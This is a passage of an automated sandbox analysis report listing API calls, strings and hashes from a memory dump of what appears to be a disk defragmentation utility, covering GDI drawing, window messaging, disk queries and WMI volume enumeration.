                                                                                                                                                                                                                                                                                    • GdipBitmapUnlockBits.GDIPLUS(?,?,?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004017F1
                                                                                                                                                                                                                                                                                    • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00401817
                                                                                                                                                                                                                                                                                    • GdipGetImageGraphicsContext.GDIPLUS(?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?), ref: 0040182D
                                                                                                                                                                                                                                                                                    • GdipDrawImageI.GDIPLUS(00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?), ref: 00401840
                                                                                                                                                                                                                                                                                    • GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?), ref: 00401846
                                                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?), ref: 0040184C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Gdip$Image$Bitmap$BitsGraphicsPalette$ContextCreateDeleteDisposeDrawFormatFromHeightLockPixelScan0SizeUnlockWidth
                                                                                                                                                                                                                                                                                    • String ID: &$>=
                                                                                                                                                                                                                                                                                    • API String ID: 1279047860-1654677323
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,00000328,?,00000000), ref: 00453F69
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453FDE
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454016
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328,00000000,00000000), ref: 00454026
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454057
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 00454066
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?), ref: 00454071
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540A7
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540D7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                    • String ID: C:\$JD$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 4273481478-1318463505
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00453C29
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453C9B
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453CD3
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045B451), ref: 00453CE3
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453D14
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00453D23
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D2E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D64
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00453D94
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                    • String ID: C:\$JD$\\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 4273481478-1318463505
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000,BB40E64E,00094658,?,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00419894
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 004198B6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Uninitialize$BlanketCreateInitializeInstanceProxy
                                                                                                                                                                                                                                                                                    • String ID: Caption$SELECT * from Win32_Volume$WQL
                                                                                                                                                                                                                                                                                    • API String ID: 3575674281-2330458756
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsWindow.USER32(004216E9), ref: 00422459
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004224AE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 004224E0
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(004216E9,00000001,000003E8,00000000), ref: 0042250F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008004,00000000), ref: 00422558
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008013,00000000), ref: 0042256D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,00008007,00000000), ref: 00422582
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000401,0000800C,00000000), ref: 00422597
                                                                                                                                                                                                                                                                                    • SetTimer.USER32(004216E9,00000064,00000064,00000000), ref: 004225A3
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Timer$Window
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 389327760-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040ED30
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0040EDD3
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040EDF9
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 0040EE67
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040EE77
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0040EEEE
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040EF77
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 0040EFD9
                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,?,?,?,?), ref: 0040F00C
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0040F073
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Rect$CompatibleCopyCreateMessageSend$Bitmap
                                                                                                                                                                                                                                                                                    • String ID: $8F
                                                                                                                                                                                                                                                                                    • API String ID: 2897418849-3711173759
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadMenuW.USER32(00000000), ref: 00425C5A
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000003), ref: 00425C85
                                                                                                                                                                                                                                                                                    • CheckMenuItem.USER32(?,00008029,00000008), ref: 00425DAB
                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(?,00000088), ref: 00425DBD
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CheckItemLoadRectWindow
                                                                                                                                                                                                                                                                                    • String ID: 1003007$1003008$1003009$1003010$3401095$DefragFinish$DiskDefrag$^H
                                                                                                                                                                                                                                                                                    • API String ID: 64815558-4023297699
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042FE87
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FF25
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000083FE,?,?), ref: 0042FF79
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 0042FFF3
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00430097
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterSection
                                                                                                                                                                                                                                                                                    • String ID: /e,/select,"%s%s"$8F$explorer.exe$open
                                                                                                                                                                                                                                                                                    • API String ID: 2245208738-1918814442
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CAB6
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0042CAE7
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0042CB0D
                                                                                                                                                                                                                                                                                    • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB22
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0042CB35
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0042CB43
                                                                                                                                                                                                                                                                                    • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB58
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$NotifyParentVisibleWindow
                                                                                                                                                                                                                                                                                    • String ID: 8F$LG$`=$F
                                                                                                                                                                                                                                                                                    • API String ID: 2910063261-562919243
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004159AA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00415AB2
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402005$3402065$3402067$3402068$3402069$3402070$3402071$3402072$3402084
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-328498535
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00417F45
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00417F5B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0047D9D0,00001001,00000000,?), ref: 0041804D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3401074$3401075$3401076$3401077$8<$DiskDefrag$Mid_Back_Color$Window
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2758692112
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0042C6CB
                                                                                                                                                                                                                                                                                      • Part of subcall function 0042D010: SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042D041
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                                                                    • String ID: 3401007$3401034$3401035$8<$DiskDefrag$Frame_Color$Mid_Back_Color$Text_Color$Window$Window_Back_Gray_Color
                                                                                                                                                                                                                                                                                    • API String ID: 909852535-1675042175
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateInitializeInstance
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3519745914-0
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Optimize\OptimizeList,?,?,?,?,00427EC2,BB40E64E), ref: 0041D36A
                                                                                                                                                                                                                                                                                    • #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D397
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.2349381511.0000000000400000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350013723.0000000000496000.00000008.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000499000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000551000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.000000000055A000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000565000.00000002.00000001.01000000.00000014.sdmp
• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: *.avi,*.mpg,*.mpeg,*.mov,*.mkv,*.mp3,*.mp4,*.wmv$*.iso,*.bin$*.zip, *.rar$3403001$3403002$3403003$DiskDefrag\Setting Option\Optimize\OptimizeList$`=
                                                                                                                                                                                                                                                                                    • API String ID: 0-4238402903
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040FD1F
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 0040FD37
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040FD46
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040FDC3
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0040FE29
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0040FE38
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000120F,?,00000000), ref: 0040FE6C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000120B,00000000,?), ref: 0040FE82
                                                                                                                                                                                                                                                                                    • RectVisible.GDI32(?,?), ref: 0040FEAC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$ClientRect$CursorObjectScreenVisible
                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                    • API String ID: 883400287-2564639436
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042DA84
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0042DAAE
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0042DAD4
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0042DAF2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0042DB00
                                                                                                                                                                                                                                                                                    • FillRect.USER32(?,?,?), ref: 0042DB38
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042DBBE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateRect$BitmapClientFillMessageObjectSelectSend
                                                                                                                                                                                                                                                                                    • String ID: 8F$ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                    • API String ID: 24576784-4007200279
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadMenuW.USER32(00000000), ref: 004228FF
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000004,00000000), ref: 0042292A
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(BB40E64E), ref: 00422945
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CursorLoad
                                                                                                                                                                                                                                                                                    • String ID: 3401032$3401033$3401086$3401087$3401088$[SSD]$^H
                                                                                                                                                                                                                                                                                    • API String ID: 3043871728-172525985
                                                                                                                                                                                                                                                                                    • Opcode ID: f940a40794934a51ee4772cd30885b94db5c25453e11a9b3154fe19872a85203
                                                                                                                                                                                                                                                                                    • Instruction ID: c9e3dbd840687df198e490246c1b34f6b1a62d60348da21d10426e52b8988a23
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f940a40794934a51ee4772cd30885b94db5c25453e11a9b3154fe19872a85203
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B4196F17543006AD764EB64DC42F9F72A8AF84B10F20C91FB65EA26C0CEBC640547AD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32 ref: 0040F806
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001215,00000000,00000000), ref: 0040F82F
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040F845
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040F876
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040F88B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F0C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F1E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001209,00000000,00000000), ref: 0040F9EE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageRectSend$Copy$Client
                                                                                                                                                                                                                                                                                    • String ID: $6$8F
                                                                                                                                                                                                                                                                                    • API String ID: 201260696-978989186
                                                                                                                                                                                                                                                                                    • Opcode ID: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                    • Instruction ID: 8b216fbeb9dde18344444fa578b156f2309188772abd6b45e307a88af5c25f20
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4E141B15083429FD320DF25C580A9BFBE9FF88704F004A2EF49997381D778A949CB96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004187CD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004187EF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0041899B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 004189AF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004189C5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,?), ref: 004189DB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterSection
                                                                                                                                                                                                                                                                                    • String ID: %.2f%%$%I64u$8F
                                                                                                                                                                                                                                                                                    • API String ID: 2245208738-1881348792
                                                                                                                                                                                                                                                                                    • Opcode ID: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                    • Instruction ID: e1e33ad56b98f5e84924c458d64c7c6c02eb77d82da0e984fc61a5a5d3d1ca0d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EA16E71304201AFD368EB24CD85FAFB7B9AF88704F40491EF64697291DBB4AC45CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00418B07
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,BB40E64E,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00418BA8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000083FE,?,?), ref: 00418BF6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000003), ref: 00418C9F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419460: SendMessageW.USER32(?,0000100C,?,00000002), ref: 00419470
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,open,explorer.exe,?,00000000,00000001), ref: 00418D51
                                                                                                                                                                                                                                                                                    Strings
